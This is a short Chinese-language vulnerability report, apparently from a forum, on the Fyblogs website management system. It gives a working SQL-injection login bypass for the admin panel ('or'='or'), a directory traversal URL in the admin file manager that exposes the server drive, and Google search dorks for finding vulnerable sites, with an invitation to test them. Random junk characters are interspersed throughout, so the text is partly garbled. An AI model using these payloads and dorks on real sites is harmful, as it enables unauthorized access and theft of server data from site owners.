漏洞类型: 未授权访问/权限绕过$ G& z; q J+ ~+ a' d
6 j" Y+ Q1 {- s0 N简要描述:
) D+ ]5 @0 T+ A
' B$ }- a8 s# a y) D# `Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
# J- J: i- |* r* c a1 w3 x# r6 P) f
详细说明:! ]" m; j0 f; G0 T/ b& e3 U
4 u/ e* E( N6 r+ |
后台万能密码 'or'='or'
+ v9 m: C- j0 |5 l4 O! i+ R' P后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!! _( T: ]; K# G- y$ q+ Z
admin/uploadfile.asp?currentFolder=/upfiles/../
! g/ t7 T4 b& z& N6 E' [# i& v. @* D& m+ F8 O9 S+ m
漏洞证明:
1 L. W) g V5 ?5 W0 K% y: U
% S% [& c% x) a0 y% x谷歌:inurl:type.asp?id=1 新闻中心
( S& u- u% }' s. i6 I或者 :inurl:download_ok.asp?! N d6 p9 ^0 g, L" H. t- c& f
+ V$ c8 O9 r5 F4 N8 N+ y3 b+ }可以测试
$ x5 t: l4 V' k7 G; V2 M, x5 K: p( M+ Y) n9 b9 C4 k" j
6 W5 W6 {% s4 f1 E) g4 R: `, X |